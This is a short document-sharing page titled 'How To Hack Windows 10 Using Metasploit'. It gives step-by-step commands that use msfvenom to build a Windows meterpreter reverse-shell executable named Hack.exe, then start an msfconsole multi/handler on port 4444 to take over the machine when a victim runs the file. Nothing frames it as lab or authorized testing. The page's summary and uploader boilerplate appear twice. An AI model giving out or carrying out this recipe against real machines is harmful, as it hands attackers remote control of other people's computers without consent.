0% found this document useful (0 votes)
348 views

How To Hack Windows 10 Using Metasploit in Windows 10

The document provides instructions for using msfvenom to generate a reverse_tcp meterpreter payload executable and msfconsole to handle the connection. It first has the user generate a Hack.exe file with msfvenom that connects back to their machine on port 4444, then has them start msfconsole as a handler on that same port to receive the connection when Hack.exe is executed.

Uploaded by

adam Iskandar
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
348 views

How To Hack Windows 10 Using Metasploit in Windows 10

The document provides instructions for using msfvenom to generate a reverse_tcp meterpreter payload executable and msfconsole to handle the connection. It first has the user generate a Hack.exe file with msfvenom that connects back to their machine on port 4444, then has them start msfconsole as a handler on that same port to receive the connection when Hack.exe is executed.

Uploaded by

adam Iskandar
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 1

Open CMD and type this:

1.msfvenom -p windows/meterpreter/reverse_tcp -a x86 –platform windows -f exe


LHOST= LPORT=4444 -o /root/Desktop/Hack.exe
2.After done close the cmd
3.Refresh the desktop

Open new CMD and type:

1.msfconsole

2.use exploit/multi/handler

3.set payload windows/meterpreter/reverse_tcp

4.set LHOST

5.set LPORT 4444

6.exploit

You might also like